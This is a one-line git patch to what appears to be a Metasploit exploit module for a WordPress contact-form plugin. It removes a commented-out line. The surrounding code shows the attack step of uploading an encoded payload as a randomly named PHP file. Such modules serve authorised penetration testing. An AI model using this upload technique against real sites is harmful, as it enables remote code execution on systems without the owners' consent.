From cccda4e851b6e4224dc8718ee0bffbeb7dc99385 Mon Sep 17 00:00:00 2001 From: Roberto Soares Date: Thu, 16 Apr 2015 04:27:15 -0300 Subject: [PATCH] Removed unnecessary line. --- .../exploits/unix/webapp/wp_creativecontactform_file_upload.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/exploits/unix/webapp/wp_creativecontactform_file_upload.rb b/modules/exploits/unix/webapp/wp_creativecontactform_file_upload.rb index 1c600357cc..bea493f028 100644 --- a/modules/exploits/unix/webapp/wp_creativecontactform_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_creativecontactform_file_upload.rb @@ -54,7 +54,6 @@ class Metasploit3 < Msf::Exploit::Remote php_pagename = rand_text_alpha(8 + rand(8)) + '.php' data = Rex::MIME::Message.new - #data.add_part('files[]', nil, nil, 'form-data; name="action"') data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"files[]\"; filename=\"#{php_pagename}\"") post_data = data.to_s